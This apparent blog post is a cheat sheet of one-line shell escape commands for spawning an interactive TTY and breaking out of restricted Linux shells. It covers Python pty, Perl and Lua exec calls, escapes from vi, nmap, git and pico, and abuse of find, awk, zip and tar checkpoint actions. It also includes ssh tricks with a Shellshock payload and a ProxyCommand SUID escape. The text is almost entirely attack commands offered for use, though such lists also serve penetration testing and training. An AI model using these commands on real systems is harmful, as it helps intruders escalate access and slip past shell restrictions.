Spawning a TTY Shell: Escaping Various Linux Shells to Execute Commands

Published: 2024-05-19



python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB: exec "/bin/sh"
From within vi: :!bash
From within vi: :set shell=/bin/bash, then :shell
From within nmap: !sh
From scp: scp -S /path/yourscript x y:
AWK: awk 'BEGIN {system("/bin/sh")}' (or "/bin/bash")
find: find / -name test -exec /bin/sh \; (or /bin/bash)
ssh: ssh username@IP -t "/bin/sh" (or "/bin/bash")
ssh username@IP -t "bash --noprofile"
ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
git: from the help pager, enter an interactive shell with !/bin/bash
pico -s "/bin/bash": enter the editor, write /bin/bash, then press Ctrl+T
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

Source: lsh4ck's Blog
